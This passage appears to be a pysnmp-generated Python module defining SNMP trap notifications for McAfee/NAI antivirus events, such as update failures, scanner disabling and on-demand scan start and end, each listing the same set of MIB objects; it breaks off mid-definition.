mcafee_EVENT_UPDATEFAILED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1119)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPDATE_RUNNING = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1120)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPDATECANCELED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1121)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPGRADE_RUNNING = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1122)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPGRADE_FAILED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1123)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPGRADE_CANCELED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1124)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPDATE_VERSION_OLDER = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1125)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_CANCELED_BY_UPD = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1126)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCANNER_DISABLED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1127)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_START_PROCESS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1200)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_PROCESS_ENDED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1201)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_ODS_SCAN_STARTED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1202)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_ODS_SCAN_ENDED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1203)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", 